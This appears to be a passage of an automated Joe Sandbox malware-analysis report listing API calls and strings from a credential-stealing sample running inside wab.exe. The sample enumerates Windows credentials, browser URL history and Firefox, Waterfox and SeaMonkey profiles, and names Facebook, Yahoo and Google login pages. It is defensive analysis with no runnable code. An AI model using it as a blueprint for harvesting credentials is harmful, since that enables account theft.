                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2827331108-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                                                                    • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                    • API String ID: 3883404497-2982631422
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 509814883-3916222277
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                    • API String ID: 1407640353-1717621600
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                    • API String ID: 62308376-4196376884
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                    • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3191383707-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                    • API String ID: 3527940856-11920434
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                    • API String ID: 3527940856-2068335096
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                    • API String ID: 3527940856-3369679110
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                                                                    • API String ID: 3030842498-1896041820
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2941347001-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                    • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 669240632-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

